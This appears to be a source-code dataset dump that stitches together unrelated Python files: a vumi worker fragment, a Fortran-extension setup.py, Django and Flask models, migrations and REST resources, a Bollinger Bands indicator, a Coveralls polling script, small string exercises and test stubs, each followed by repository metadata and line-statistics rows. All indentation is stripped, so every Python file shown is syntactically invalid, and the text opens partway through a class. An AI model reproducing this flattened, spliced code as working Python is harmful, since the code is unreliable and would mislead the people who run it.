def teardown_worker(self):
raise NotImplementedError()
def setup_middleware(self):
"""Create middlewares from config."""
d = setup_middlewares_from_config(self, self.config)
d.addCallback(self.middlewares.extend)
return d
def teardown_middleware(self):
"""Teardown middlewares."""
d = succeed(None)
for mw in reversed(self.middlewares):
then_call(d, mw.teardown_middleware)
return d
def get_static_config(self):
"""Return static (message independent) configuration."""
return self._static_config
def get_config(self, msg, ctxt=None):
"""This should return a message and context specific config object.
It deliberately returns a deferred even when this isn't strictly
necessary to ensure that workers will continue to work when per-message
configuration needs to be fetched from elsewhere.
"""
return succeed(self.CONFIG_CLASS(self.config))
def _validate_config(self):
"""Once subclasses call `super().validate_config` properly,
this method can be removed.
"""
# TODO: remove this once all uses of validate_config have been fixed.
self.validate_config()
def validate_config(self):
"""
Application-specific config validation happens in here.
Subclasses may override this method to perform extra config
validation.
"""
# TODO: deprecate this in favour of a similar method on
# config classes.
pass
def setup_connector(self, connector_cls, connector_name, middleware=False):
if connector_name in self.connectors:
raise DuplicateConnectorError("Attempt to add duplicate connector"
" with name %r" % (connector_name,))
prefetch_count = self.get_static_config().amqp_prefetch_count
middlewares = self.middlewares if middleware else None
connector = connector_cls(self, connector_name,
prefetch_count=prefetch_count,
middlewares=middlewares)
self.connectors[connector_name] = connector
d = connector.setup()
d.addCallback(lambda r: connector)
return d
def teardown_connector(self, connector_name):
connector = self.connectors.pop(connector_name)
d = connector.teardown()
d.addCallback(lambda r: connector)
return d
def setup_ri_connector(self, connector_name, middleware=True):
return self.setup_connector(ReceiveInboundConnector, connector_name,
middleware=middleware)
def setup_ro_connector(self, connector_name, middleware=True):
return self.setup_connector(ReceiveOutboundConnector, connector_name,
middleware=middleware)
def pause_connectors(self):
return gatherResults([
connector.pause() for connector in self.connectors.itervalues()])
def unpause_connectors(self):
for connector in self.connectors.itervalues():
connector.unpause()
| 35.967136
| 79
| 0.645477
| 6,862
| 0.895706
| 851
| 0.111082
| 872
| 0.113823
| 0
| 0
| 1,997
| 0.260671
|
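A structural sketch of the subclassing contract described in BaseWorker's docstring above: implement setup_connectors, setup_worker and teardown_worker. It assumes the vumi and Twisted packages shown above are importable; EchoWorker and the 'echo' connector name are made up, and this is not a complete runnable service.

from twisted.internet.defer import succeed

from vumi.worker import BaseWorker


class EchoWorker(BaseWorker):
    """Sketch only: shows which hooks a concrete worker provides."""

    def setup_connectors(self):
        # register a single inbound connector (middleware enabled by default)
        return self.setup_ri_connector('echo')

    def setup_worker(self):
        # no extra setup beyond the connector
        return succeed(None)

    def teardown_worker(self):
        return succeed(None)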
3bc950ff5c221db7b60343065a9a70cf058a7e1a
| 1,204
|
py
|
Python
|
tt/ksl/setup.py
|
aiboyko/ttpy
|
8fda9d29e27e4f9f68ffba5cc1e16b3020eb131f
|
[
"MIT"
] | 2
|
2021-04-02T17:42:03.000Z
|
2021-11-17T11:30:42.000Z
|
tt/ksl/setup.py
|
qbit-/ttpy
|
596b1c9fe6ce5f0ba66d801ac88a1147204cec2f
|
[
"MIT"
] | null | null | null |
tt/ksl/setup.py
|
qbit-/ttpy
|
596b1c9fe6ce5f0ba66d801ac88a1147204cec2f
|
[
"MIT"
] | 1
|
2021-01-10T07:02:09.000Z
|
2021-01-10T07:02:09.000Z
|
# setup.py
# This script will build the main subpackages
# See LICENSE for details
from __future__ import print_function, absolute_import
from numpy.distutils.misc_util import Configuration
from os.path import join
TTFORT_DIR = '../tt-fort'
EXPM_DIR = '../tt-fort/expm'
EXPOKIT_SRC = [
'explib.f90',
'normest.f90',
'expokit.f',
'dlacn1.f',
'dlapst.f',
'dlarpc.f',
'zlacn1.f',
]
TTKSL_SRC = [
'ttals.f90',
'tt_ksl.f90',
'tt_diag_ksl.f90'
]
def configuration(parent_package='', top_path=None):
expokit_src = [join(EXPM_DIR, x) for x in EXPOKIT_SRC]
ttksl_src = [join(TTFORT_DIR, x) for x in TTKSL_SRC]
ttksl_src.append('tt_ksl.pyf')
config = Configuration('ksl', parent_package, top_path)
config.add_library(
'expokit',
sources=expokit_src,
)
config.add_extension(
'dyn_tt',
sources=ttksl_src,
depends=[
'print_lib',
'expokit',
'mytt',
],
libraries=[
'print_lib',
'expokit',
'mytt',
],
)
return config
if __name__ == '__main__':
print('This is the wrong setup.py to run')
| 19.737705
| 59
| 0.58887
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 364
| 0.302326
|
3bcd4cf0614ab6f7c88bcffd7170ce176a5a3489
| 305
|
py
|
Python
|
tests/text_processors/test_json_text_processor.py
|
lyteloli/NekoGram
|
f077471000b40a74e0eb4e98dfb570b5e34d23ab
|
[
"MIT"
] | 8
|
2020-08-21T07:43:52.000Z
|
2022-01-27T06:48:01.000Z
|
tests/text_processors/test_json_text_processor.py
|
lyteloli/NekoGram
|
f077471000b40a74e0eb4e98dfb570b5e34d23ab
|
[
"MIT"
] | null | null | null |
tests/text_processors/test_json_text_processor.py
|
lyteloli/NekoGram
|
f077471000b40a74e0eb4e98dfb570b5e34d23ab
|
[
"MIT"
] | 1
|
2022-01-27T06:48:02.000Z
|
2022-01-27T06:48:02.000Z
|
from NekoGram import Neko, Bot
import json
def test_json_text_processor():
neko = Neko(bot=Bot(token='0:0', validate_token=False), validate_text_names=False)
raw_json = '{"x": {"text": "hello"} }'
neko.add_texts(texts=raw_json, lang='en')
assert neko.texts['en'] == json.loads(raw_json)
| 30.5
| 86
| 0.688525
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 40
| 0.131148
|
3bcdd1ca315307c12c5399ab4a8df2ed64ad6708
| 7,960
|
py
|
Python
|
itdagene/app/meetings/migrations/0001_initial.py
|
itdagene-ntnu/itdagene
|
b972cd3d803debccebbc33641397a39834b8d69a
|
[
"MIT"
] | 9
|
2018-10-17T20:58:09.000Z
|
2021-12-16T16:16:45.000Z
|
itdagene/app/meetings/migrations/0001_initial.py
|
itdagene-ntnu/itdagene
|
b972cd3d803debccebbc33641397a39834b8d69a
|
[
"MIT"
] | 177
|
2018-10-27T18:15:56.000Z
|
2022-03-28T04:29:06.000Z
|
itdagene/app/meetings/migrations/0001_initial.py
|
itdagene-ntnu/itdagene
|
b972cd3d803debccebbc33641397a39834b8d69a
|
[
"MIT"
] | null | null | null |
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [migrations.swappable_dependency(settings.AUTH_USER_MODEL)]
operations = [
migrations.CreateModel(
name="Meeting",
fields=[
(
"id",
models.AutoField(
verbose_name="ID",
serialize=False,
auto_created=True,
primary_key=True,
),
),
("date_created", models.DateTimeField(editable=False)),
("date_saved", models.DateTimeField(editable=False)),
("date", models.DateField(verbose_name="date")),
("start_time", models.TimeField(verbose_name="from time")),
(
"end_time",
models.TimeField(null=True, verbose_name="to time", blank=True),
),
(
"type",
models.PositiveIntegerField(
default=0,
verbose_name="type",
choices=[
(0, "Board meeting"),
(1, "Web"),
(2, "Banquet"),
(3, "Logistics"),
(4, "Marketing"),
(5, "Other"),
],
),
),
(
"location",
models.CharField(
max_length=40, verbose_name="location", blank=True
),
),
(
"abstract",
models.TextField(null=True, verbose_name="abstract", blank=True),
),
(
"is_board_meeting",
models.BooleanField(default=True, verbose_name="is board meeting"),
),
(
"creator",
models.ForeignKey(
related_name="meeting_creator",
editable=False,
to=settings.AUTH_USER_MODEL,
on_delete=models.CASCADE,
),
),
(
"referee",
models.ForeignKey(
related_name="refereed_meetings",
verbose_name="referee",
blank=True,
on_delete=models.CASCADE,
to=settings.AUTH_USER_MODEL,
null=True,
),
),
(
"saved_by",
models.ForeignKey(
related_name="meeting_saved_by",
editable=False,
on_delete=models.CASCADE,
to=settings.AUTH_USER_MODEL,
),
),
],
options={"verbose_name": "meeting", "verbose_name_plural": "meetings"},
bases=(models.Model,),
),
migrations.CreateModel(
name="Penalty",
fields=[
(
"id",
models.AutoField(
verbose_name="ID",
serialize=False,
auto_created=True,
primary_key=True,
),
),
("date_created", models.DateTimeField(editable=False)),
("date_saved", models.DateTimeField(editable=False)),
(
"type",
models.CharField(
default="beer",
max_length=10,
verbose_name="type",
choices=[(b"beer", "Beer"), (b"wine", "Wine")],
),
),
(
"bottles",
models.PositiveIntegerField(
default=2, verbose_name="number of bottles"
),
),
("reason", models.TextField(verbose_name="reason")),
(
"creator",
models.ForeignKey(
related_name="penalty_creator",
editable=False,
to=settings.AUTH_USER_MODEL,
on_delete=models.CASCADE,
),
),
(
"meeting",
models.ForeignKey(
verbose_name="meeting",
blank=True,
to="meetings.Meeting",
null=True,
on_delete=models.SET_NULL,
),
),
(
"saved_by",
models.ForeignKey(
related_name="penalty_saved_by",
editable=False,
to=settings.AUTH_USER_MODEL,
on_delete=models.CASCADE,
),
),
(
"user",
models.ForeignKey(
related_name="penalties",
verbose_name="person",
to=settings.AUTH_USER_MODEL,
on_delete=models.CASCADE,
),
),
],
options={"abstract": False},
bases=(models.Model,),
),
migrations.CreateModel(
name="ReplyMeeting",
fields=[
(
"id",
models.AutoField(
verbose_name="ID",
serialize=False,
auto_created=True,
primary_key=True,
),
),
("date_created", models.DateTimeField(editable=False)),
("date_saved", models.DateTimeField(editable=False)),
(
"is_attending",
models.NullBooleanField(default=False, verbose_name="attending"),
),
(
"creator",
models.ForeignKey(
related_name="replymeeting_creator",
editable=False,
to=settings.AUTH_USER_MODEL,
on_delete=models.CASCADE,
),
),
(
"meeting",
models.ForeignKey(
related_name="replies",
verbose_name="meeting",
to="meetings.Meeting",
on_delete=models.CASCADE,
),
),
(
"saved_by",
models.ForeignKey(
related_name="replymeeting_saved_by",
editable=False,
to=settings.AUTH_USER_MODEL,
on_delete=models.CASCADE,
),
),
(
"user",
models.ForeignKey(
verbose_name="user",
to=settings.AUTH_USER_MODEL,
on_delete=models.CASCADE,
),
),
],
options={"abstract": False},
bases=(models.Model,),
),
]
| 35.695067
| 87
| 0.358417
| 7,842
| 0.985176
| 0
| 0
| 0
| 0
| 0
| 0
| 848
| 0.106533
|
3bcdfa047a911d02d5d42da304bd32569f2f1c95
| 2,247
|
py
|
Python
|
models/mail.py
|
Huy-Ngo/temp-mail
|
6269f1f405cd7447ea0d45799ee1c4a0623d23a6
|
[
"MIT"
] | 3
|
2022-01-18T17:15:17.000Z
|
2022-01-22T09:52:19.000Z
|
models/mail.py
|
Huy-Ngo/temp-mail
|
6269f1f405cd7447ea0d45799ee1c4a0623d23a6
|
[
"MIT"
] | 28
|
2020-06-18T08:53:32.000Z
|
2020-08-07T02:33:47.000Z
|
models/mail.py
|
Huy-Ngo/temp-mail
|
6269f1f405cd7447ea0d45799ee1c4a0623d23a6
|
[
"MIT"
] | null | null | null |
# Copyright (c) 2020 Ngô Ngọc Đức Huy
from db import db
class MailModel(db.Model):
"""Model for representing and storing mails."""
id = db.Column(db.Integer, primary_key=True)
sender = db.Column(db.String(254))
recipient = db.Column(db.String(254),
db.ForeignKey('user_model.email_address'),
nullable=False)
# headers
mail_from = db.Column(db.String(300))
rcpt_to = db.Column(db.String(300))
date = db.Column(db.DateTime)
subject = db.Column(db.String(150))
# payload
text = db.Column(db.String)
html = db.Column(db.String)
# status check
is_read = db.Column(db.Boolean, default=False)
def __init__(self, sender, recipient, mail_from,
rcpt_to, date, subject, text, html):
self.sender = sender
self.recipient = recipient
self.mail_from = mail_from
self.rcpt_to = rcpt_to
self.date = date
self.subject = subject
self.text = text
self.html = html
self.is_read = False
def json(self) -> dict:
"""Return the information of the object as a JSON"""
return {
'id': self.id,
'sender': self.sender,
'recipient': self.recipient,
'headers': {
'from': self.mail_from,
'to': self.rcpt_to,
'date': self.date.__str__(),
'subject': self.subject
},
'payload': {
'text': self.text,
'html': self.html
},
'is_read': self.is_read
}
@classmethod
def fetch_by_address(cls, address: str):
"""Get all the mails sent to the address."""
return cls.query.filter_by(recipient=address).all()
@classmethod
def fetch_by_id(cls, _id: int):
"""Get the email that has a specific ID."""
return cls.query.filter_by(id=_id).first()
def save_to_db(self):
"""Save the email to database."""
db.session.add(self)
db.session.commit()
def set_read(self):
"""Set the email as read."""
self.is_read = True
db.session.add(self)
db.session.commit()
| 28.807692
| 68
| 0.549622
| 2,185
| 0.969818
| 0
| 0
| 321
| 0.142477
| 0
| 0
| 437
| 0.193964
|
3bce9c159c555e02a3e9d2befee3b2b0dfb1fa84
| 1,681
|
py
|
Python
|
jesse/indicators/bollinger_bands.py
|
leaiannotti/jesse
|
564c54845774891ff3b5a8d3c02cc7cea890ac54
|
[
"MIT"
] | 5
|
2021-05-21T07:39:16.000Z
|
2021-11-17T11:08:41.000Z
|
jesse/indicators/bollinger_bands.py
|
leaiannotti/jesse
|
564c54845774891ff3b5a8d3c02cc7cea890ac54
|
[
"MIT"
] | null | null | null |
jesse/indicators/bollinger_bands.py
|
leaiannotti/jesse
|
564c54845774891ff3b5a8d3c02cc7cea890ac54
|
[
"MIT"
] | 2
|
2021-05-21T10:14:53.000Z
|
2021-05-27T04:39:51.000Z
|
from collections import namedtuple
import numpy as np
import talib
from jesse.indicators.ma import ma
from jesse.indicators.mean_ad import mean_ad
from jesse.indicators.median_ad import median_ad
from jesse.helpers import get_candle_source, slice_candles
BollingerBands = namedtuple('BollingerBands', ['upperband', 'middleband', 'lowerband'])
def bollinger_bands(candles: np.ndarray, period: int = 20, devup: float = 2, devdn: float = 2, matype: int = 0, devtype: int = 0,
source_type: str = "close",
sequential: bool = False) -> BollingerBands:
"""
BBANDS - Bollinger Bands
:param candles: np.ndarray
:param period: int - default: 20
:param devup: float - default: 2
:param devdn: float - default: 2
:param matype: int - default: 0
:param devtype: int - default: 0
:param source_type: str - default: "close"
:param sequential: bool - default=False
:return: BollingerBands(upperband, middleband, lowerband)
"""
candles = slice_candles(candles, sequential)
source = get_candle_source(candles, source_type=source_type)
if devtype == 0:
dev = talib.STDDEV(source, period)
elif devtype == 1:
dev = mean_ad(source, period, sequential=True)
elif devtype == 2:
dev = median_ad(source, period, sequential=True)
middlebands = ma(source, period=period, matype=matype, sequential=True)
upperbands = middlebands + devup * dev
lowerbands = middlebands - devdn * dev
if sequential:
return BollingerBands(upperbands, middlebands, lowerbands)
else:
return BollingerBands(upperbands[-1], middlebands[-1], lowerbands[-1])
| 32.960784
| 129
| 0.684117
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 467
| 0.277811
|
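A pure-NumPy sketch of the band arithmetic implemented in bollinger_bands above: a simple moving average middle band with upper/lower bands at plus/minus devup/devdn population standard deviations. The matype/devtype variants and the talib/jesse dependencies are deliberately left out.

import numpy as np


def simple_bollinger(source, period=20, devup=2.0, devdn=2.0):
    source = np.asarray(source, dtype=float)
    middle = np.empty(source.size - period + 1)
    dev = np.empty_like(middle)
    for i in range(middle.size):
        window = source[i:i + period]
        middle[i] = window.mean()  # simple moving average (matype 0 above)
        dev[i] = window.std()      # population std-dev (devtype 0 above)
    return middle + devup * dev, middle, middle - devdn * dev


prices = 100 + np.cumsum(np.random.default_rng(0).normal(size=200))
upper, middle, lower = simple_bollinger(prices)
print(round(upper[-1], 2), round(middle[-1], 2), round(lower[-1], 2))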
3bcf9e27b60f3e382de5df8d52f14b8d023fe9df
| 3,050
|
py
|
Python
|
coveralls_check.py
|
jayvdb/coveralls-check
|
ca3b0428b90fe3c6d22cad3a122dedc2c46d12e4
|
[
"MIT"
] | null | null | null |
coveralls_check.py
|
jayvdb/coveralls-check
|
ca3b0428b90fe3c6d22cad3a122dedc2c46d12e4
|
[
"MIT"
] | 2
|
2018-07-11T07:09:25.000Z
|
2022-03-10T12:18:18.000Z
|
coveralls_check.py
|
jayvdb/coveralls-check
|
ca3b0428b90fe3c6d22cad3a122dedc2c46d12e4
|
[
"MIT"
] | 1
|
2020-01-10T05:27:46.000Z
|
2020-01-10T05:27:46.000Z
|
from __future__ import print_function
import logging
from argparse import ArgumentParser
import backoff
import requests
import sys
POLL_URL = 'https://coveralls.io/builds/{}.json'
DONE_URL = 'https://coveralls.io/webhook'
def setup_logging():
logger = logging.getLogger('backoff')
logger.addHandler(logging.StreamHandler())
logger.setLevel(logging.INFO)
def message(args, covered, template):
print(template.format(
args.commit, covered, args.fail_under
))
def get_coverage(commit):
response = requests.get(POLL_URL.format(commit))
data = response.json()
return data['covered_percent']
def decorate(func, args):
interval = 10
return backoff.on_predicate(
backoff.constant,
interval=interval, max_tries=args.max_wait*60/interval,
jitter=lambda value: value,
)(func)
def ensure_parallel_done(args):
if args.parallel_build_number:
response = requests.post(
DONE_URL,
params={'repo_token': args.repo_token},
json={
"payload": {
"build_num": args.parallel_build_number,
"status": "done"
}
}
)
if response.status_code == 200:
print('Confirmed end of parallel build')
else:
print(
'Attempt to confirmed end of parallel build got {}:\n{}'.format(
response.status_code, response.content
)
)
sys.exit(1)
def parse_args():
parser = ArgumentParser()
parser.add_argument('commit', help='the commit hash to check')
parser.add_argument('--fail-under', type=float, default=100,
help='Exit with a status of 2 if the total coverage is '
'less than MIN.')
parser.add_argument('--max-wait', type=int, default=5,
help='Maximum time, in minutes, to wait for Coveralls '
'data. Defaults to 5.')
parser.add_argument('--parallel-build-number', type=int,
help='The build number, eg $TRAVIS_BUILD_NUMBER.')
parser.add_argument('--repo-token',
help='Required if --parallel-build-number is used and '
'should be the token use when POSTing back to '
'coveralls to mark the parallel build as done. '
'Should come from a secret.')
return parser.parse_args()
def main():
args = parse_args()
setup_logging()
ensure_parallel_done(args)
get_coverage_ = decorate(get_coverage, args)
covered = get_coverage_(args.commit)
if covered is None:
print('No coverage information available for {}'.format(args.commit))
sys.exit(1)
elif covered < args.fail_under:
message(args, covered, 'Failed coverage check for {} as {} < {}')
sys.exit(2)
else:
message(args, covered, 'Coverage OK for {} as {} >= {}')
| 30.5
| 80
| 0.585902
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 798
| 0.261639
|
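A minimal sketch of the polling pattern coveralls_check.py builds with backoff.on_predicate: retry a callable until it returns a truthy value. It requires the backoff package the script already imports; poll_coverage is an illustrative fake, not a real Coveralls call.

import backoff

attempts = {'n': 0}


@backoff.on_predicate(backoff.constant, interval=0.1, max_tries=5)
def poll_coverage():
    # pretend coverage data only becomes available on the third poll
    attempts['n'] += 1
    return 87.5 if attempts['n'] >= 3 else None


print(poll_coverage())  # prints 87.5 after a couple of silent retries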
3bd21db03fbff68669d9cf01fd41194e607124e2
| 1,399
|
py
|
Python
|
ScienceCruiseDataManagement/data_storage_management/utils.py
|
Swiss-Polar-Institute/science-cruise-data-management
|
67721a0f4a1255b8ac43e530ed95a8c324239c7c
|
[
"MIT"
] | 6
|
2017-10-06T09:18:04.000Z
|
2022-02-10T08:54:56.000Z
|
ScienceCruiseDataManagement/data_storage_management/utils.py
|
Swiss-Polar-Institute/science-cruise-data-management
|
67721a0f4a1255b8ac43e530ed95a8c324239c7c
|
[
"MIT"
] | 12
|
2020-02-27T09:24:50.000Z
|
2021-09-22T17:39:55.000Z
|
ScienceCruiseDataManagement/data_storage_management/utils.py
|
Swiss-Polar-Institute/science-cruise-data-management
|
67721a0f4a1255b8ac43e530ed95a8c324239c7c
|
[
"MIT"
] | 1
|
2017-10-16T13:49:33.000Z
|
2017-10-16T13:49:33.000Z
|
import subprocess
import glob
import os
import datetime
# This file is part of https://github.com/cpina/science-cruise-data-management
#
# This project was programmed in a hurry without any prior Django experience,
# while circumnavigating the Antarctic on the ACE expedition, without proper
# Internet access, with 150 scientists using the system and doing at the same
# cruise other data management and system administration tasks.
#
# Sadly there aren't unit tests and we didn't have time to refactor the code
# during the cruise, which is really needed.
#
# Carles Pina (carles@pina.cat) and Jen Thomas (jenny_t152@yahoo.co.uk), 2016-2017.
def log(message):
f = open(os.path.join(os.environ["HOME"], "logs", "importer.log"), "a")
now = datetime.datetime.now()
now = now.strftime("%Y-%m-%d %H:%M:%S")
f.write("{} {}\n".format(now, message))
f.close()
def rsync_copy(origin, destination):
origin = glob.glob(origin)
return execute(["rsync",
"-rvt"] + origin + [destination], print_command=True)
def execute(cmd, abort_if_fails=False, print_command=False):
if print_command:
print("** Execute: {}".format(" ".join(cmd)))
p = subprocess.Popen(cmd)
p.communicate()[0]
retval = p.returncode
if retval != 0 and abort_if_fails:
print("Command: _{}_ failed, aborting...".format(cmd))
exit(1)
return retval
| 31.088889
| 83
| 0.68549
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 701
| 0.501072
|
3bd3be55e7aed0ec74f1031095e8ca063b4aa8fd
| 515
|
py
|
Python
|
Applied Project/Web/app/config.py
|
rebeccabernie/CurrencyAnalyser
|
1f57e5b5fee854912c205cb98f57c980027f0a03
|
[
"MIT"
] | 27
|
2018-06-22T18:49:52.000Z
|
2022-02-18T07:58:48.000Z
|
Applied Project/Web/app/config.py
|
taraokelly/CurrencyAnalyser
|
1f57e5b5fee854912c205cb98f57c980027f0a03
|
[
"MIT"
] | 10
|
2020-01-28T22:24:22.000Z
|
2022-02-10T13:11:32.000Z
|
Applied Project/Web/app/config.py
|
taraokelly/CurrencyAnalyser
|
1f57e5b5fee854912c205cb98f57c980027f0a03
|
[
"MIT"
] | 6
|
2018-05-02T16:43:45.000Z
|
2020-11-17T18:00:36.000Z
|
""" Global Flask Application Settings """
import os
from app import app
class Config(object):
DEBUG = False
TESTING = False
PRODUCTION = False
class Development(Config):
MODE = 'Development'
DEBUG = True
class Production(Config):
MODE = 'Production'
DEBUG = False
PRODUCTION = True
# Set FLASK_CONFIG env to 'Production' or 'Development' to set Config
flask_config = os.environ.get('FLASK_CONFIG', 'Development')
app.config.from_object('app.config.{}'.format(flask_config))
| 19.074074
| 69
| 0.700971
| 239
| 0.464078
| 0
| 0
| 0
| 0
| 0
| 0
| 177
| 0.343689
|
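A standalone sketch of the same environment-driven configuration pattern (requires Flask). The class names mirror the file above; the configs lookup dict is an illustrative alternative to the string-based from_object call used there.

import os

from flask import Flask


class Config:
    DEBUG = False
    TESTING = False
    PRODUCTION = False


class Development(Config):
    MODE = 'Development'
    DEBUG = True


class Production(Config):
    MODE = 'Production'
    PRODUCTION = True


app = Flask(__name__)
configs = {'Development': Development, 'Production': Production}
app.config.from_object(configs[os.environ.get('FLASK_CONFIG', 'Development')])
print(app.config['MODE'], app.config['DEBUG'])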
3bd3e56f8e3f7640af1c0c1de7776e8679289263
| 103
|
py
|
Python
|
Exercise-1/Q4_reverse.py
|
abhay-lal/18CSC207J-APP
|
79a955a99837e6d41c89cb1a9e84eb0230c0fa7b
|
[
"MIT"
] | null | null | null |
Exercise-1/Q4_reverse.py
|
abhay-lal/18CSC207J-APP
|
79a955a99837e6d41c89cb1a9e84eb0230c0fa7b
|
[
"MIT"
] | null | null | null |
Exercise-1/Q4_reverse.py
|
abhay-lal/18CSC207J-APP
|
79a955a99837e6d41c89cb1a9e84eb0230c0fa7b
|
[
"MIT"
] | null | null | null |
word = input('Enter a word')
length = len(word)
for i in range(length - 1, -1, -1):
print(word[i], end='')
| 20.6
| 30
| 0.572816
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 16
| 0.15534
|
3bd475c386fa8a4a56cad45921819b936313ea64
| 162
|
py
|
Python
|
exercise/6.py
|
zhaoshengshi/practicepython-exercise
|
3e123eb602aaf1c9638c7a2199607146e860b96c
|
[
"Apache-2.0"
] | null | null | null |
exercise/6.py
|
zhaoshengshi/practicepython-exercise
|
3e123eb602aaf1c9638c7a2199607146e860b96c
|
[
"Apache-2.0"
] | null | null | null |
exercise/6.py
|
zhaoshengshi/practicepython-exercise
|
3e123eb602aaf1c9638c7a2199607146e860b96c
|
[
"Apache-2.0"
] | null | null | null |
ss = input('Please give me a string: ')
if ss == ss[::-1]:
print("Yes, %s is a palindrome." % ss)
else:
print('Nevermind, %s isn\'t a palindrome.' % ss)
| 23.142857
| 52
| 0.574074
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 89
| 0.549383
|
3bd4ef311d3ceb65a757cf2dcd1641a9fa9f94c6
| 5,420
|
py
|
Python
|
app/v2/resources/users.py
|
fabischolasi/fast-food-fast-v1
|
492f0bdaaeadf12089a200a9b64bdfc22cd03d0c
|
[
"MIT"
] | 1
|
2019-10-16T07:56:31.000Z
|
2019-10-16T07:56:31.000Z
|
app/v2/resources/users.py
|
fabzer0/FastFoodAPI
|
492f0bdaaeadf12089a200a9b64bdfc22cd03d0c
|
[
"MIT"
] | null | null | null |
app/v2/resources/users.py
|
fabzer0/FastFoodAPI
|
492f0bdaaeadf12089a200a9b64bdfc22cd03d0c
|
[
"MIT"
] | null | null | null |
from flask import Blueprint, jsonify, make_response
from flask_restful import Resource, Api, reqparse, inputs
from ..models.decorators import admin_required
from ..models.models import UserModel
import os
class SignUp(Resource):
def __init__(self):
"""
Validates both json and form-data input
"""
self.reqparse = reqparse.RequestParser()
self.reqparse.add_argument(
'username',
required=True,
help='kindly provide a valid username',
type=inputs.regex(r"(.*\S.*)"),
location=['form', 'json'])
self.reqparse.add_argument(
'email',
required=True,
help='kindly provide a valid email address',
location=['form', 'json'],
type=inputs.regex(r"(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+$)"))
self.reqparse.add_argument(
'password',
required=True,
trim=True,
help='kindly provide a valid password',
location=['form', 'json'])
self.reqparse.add_argument(
'confirm_password',
required=True,
trim=True,
help='kindly provide a valid confirmation password',
location=['form', 'json'])
super(SignUp, self).__init__()
def post(self):
"""
Register a new user
"""
kwargs = self.reqparse.parse_args()
username = kwargs.get('username')
email = kwargs.get('email')
password = kwargs.get('password')
confirm_password = kwargs.get('confirm_password')
username_exist = UserModel.get_one('users', username=username)
if username_exist:
return make_response(jsonify({'message': 'username already taken'}), 400)
if password == confirm_password:
if len(password) >= 8:
email_exists = UserModel.get_one('users', email=email)
if not email_exists:
if username == os.getenv('ADMIN'):
user = UserModel(username=username, email=email, password=password)
user.create_user()
fetch_admin = UserModel.get_one('users', username=username)
data = {'admin': True}
UserModel.update('users', id=fetch_admin[0], data=data)
user = UserModel.get_one('users', id=fetch_admin[0])
return jsonify({'admin': UserModel.user_details(user)})
user = UserModel(username=username, email=email, password=password)
user.create_user()
user = UserModel.get_one('users', username=username)
return make_response(jsonify({'message': 'successfully registered', 'user': UserModel.user_details(user)}), 201)
return make_response(jsonify({'message': 'email already taken'}), 203)
            return make_response(jsonify({'message': 'password should be at least 8 characters'}), 400)
return make_response(jsonify({"message" : "password and confirm password should be identical"}), 400)
class AllUsers(Resource):
@admin_required
def get(self):
users = UserModel.get_all('users')
if not users:
return jsonify({'message': 'no users found yet'})
return make_response(jsonify({'all_users': [UserModel.user_details(user) for user in users]}))
class PromoteUser(Resource):
@admin_required
def put(self, user_id):
user = UserModel.get_one('users', id=user_id)
if not user:
return jsonify({'message': 'user not found'})
data = {'admin': True}
UserModel.update('users', id=user[0], data=data)
user = UserModel.get_one('users', id=user_id)
return jsonify({'user': UserModel.user_details(user)})
class Login(Resource):
def __init__(self):
self.reqparse = reqparse.RequestParser()
self.reqparse.add_argument(
'email',
required=True,
help='kindly provide a valid email address',
location=['form', 'json'],
type=inputs.regex(r"(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+$)"))
self.reqparse.add_argument(
'password',
required=True,
trim=True,
help='kindly provide a valid password',
location=['form', 'json'])
super(Login, self).__init__()
def post(self):
kwargs = self.reqparse.parse_args()
email = kwargs.get('email')
password = kwargs.get('password')
user = UserModel.get_one('users', email=email)
if user is None:
return make_response(jsonify({'message': 'invalid email or password'}), 404)
if UserModel.validate_password(password=password, email=user[2]):
token = UserModel.generate_token(user)
return make_response(jsonify({'message': 'you are successfully logged in', 'token': token}), 200)
return make_response(jsonify({'message': 'invalid email or password'}), 401)
users_api = Blueprint('resources.users', __name__)
api = Api(users_api)
api.add_resource(SignUp, '/auth/signup', endpoint='signup')
api.add_resource(AllUsers, '/users')
api.add_resource(PromoteUser, '/users/<int:user_id>')
api.add_resource(Login, '/auth/login', endpoint='login')
| 38.992806
| 132
| 0.587823
| 4,921
| 0.907934
| 0
| 0
| 646
| 0.119188
| 0
| 0
| 1,238
| 0.228413
|
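A self-contained sketch of the reqparse validation pattern used by SignUp and Login above (requires Flask-RESTful). The EchoEmail resource and /echo route are illustrative and not part of this repository.

from flask import Flask
from flask_restful import Api, Resource, inputs, reqparse

EMAIL_RE = r"(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+$)"


class EchoEmail(Resource):
    def __init__(self):
        self.reqparse = reqparse.RequestParser()
        self.reqparse.add_argument(
            'email', required=True,
            help='kindly provide a valid email address',
            location=['form', 'json'], type=inputs.regex(EMAIL_RE))

    def post(self):
        args = self.reqparse.parse_args()
        return {'email': args['email']}, 200


app = Flask(__name__)
Api(app).add_resource(EchoEmail, '/echo')

if __name__ == '__main__':
    with app.test_client() as client:
        print(client.post('/echo', json={'email': 'user@example.com'}).get_json())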
3bd6298a19903f15f7e907c194b8869777800558
| 21,160
|
py
|
Python
|
model_blocks/tests.py
|
aptivate/django-model-blocks
|
5057ed57887683d777f04c95d67d268d21a18c02
|
[
"BSD-3-Clause"
] | 6
|
2015-01-20T08:43:44.000Z
|
2020-08-13T01:57:10.000Z
|
model_blocks/tests.py
|
techdragon/django-model-blocks
|
8175d7353d792cb720b4ac356f4538888bf7747c
|
[
"BSD-3-Clause"
] | 1
|
2016-10-16T17:35:07.000Z
|
2016-10-16T17:35:07.000Z
|
model_blocks/tests.py
|
techdragon/django-model-blocks
|
8175d7353d792cb720b4ac356f4538888bf7747c
|
[
"BSD-3-Clause"
] | null | null | null |
"""
Test the model blocks
"""
import datetime
from django.test import TestCase
from mock import Mock
from django.db.models import Model, IntegerField, DateTimeField, CharField
from django.template import Context, Template, TemplateSyntaxError
